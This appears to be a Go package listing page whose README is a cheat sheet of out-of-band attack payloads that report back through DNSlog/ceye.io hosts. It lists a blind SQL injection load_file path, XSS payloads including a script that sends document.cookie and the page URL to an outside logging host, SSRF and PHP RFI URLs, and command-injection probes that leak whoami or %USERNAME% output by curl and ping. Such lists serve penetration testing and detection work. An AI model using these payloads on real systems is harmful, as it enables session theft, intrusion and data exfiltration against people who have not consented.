package
0.0.0-20230830084321-7f13dd77bf30
Repository: https://github.com/hktalent/go4hacker.git
Documentation: pkg.go.dev
# README
Blind sqli
select load_file('\\\\afanti.xxxx.ceye.io\\aaa');
XSS
Payload1:
><img src=http://xss.xxxx.ceye.io/log/xss001>
blind Payload2:
var s=document.createElement('img');
s.src="http://xss.test.dnslog.link/?url="+document.location+"&cookie="+document.cookie;
document.head.appendChild(s);
SSRF
http://xss.xxxx.ceye.io/payload/phprfi
php RFI
http://xss.xxxx.ceye.io/aaa
RCE
linux/unix:
curl http://haha.xxx.ceye.io/`whoami`
ping `whoami`.xxxx.ceye.io
windows:
ping %USERNAME%.xxx.ceye.io
XXE
see http://ceye.io/payloads XXE
Others
see http://ceye.io/payloads XXE
Reference
https://www.cnblogs.com/rnss/p/11320305.html http://ceye.io/payloads http://foreversong.cn/archives/861 https://bbs.ichunqiu.com/thread-22002-1-1.html http://blog.knownsec.com/2016/06/how-to-scan-and-check-vulnerabilities/ https://www.freebuf.com/column/184587.html https://blog.51cto.com/tar0cissp/2337779 https://github.com/BugScanTeam/DNSLog
# Functions
No description provided by the author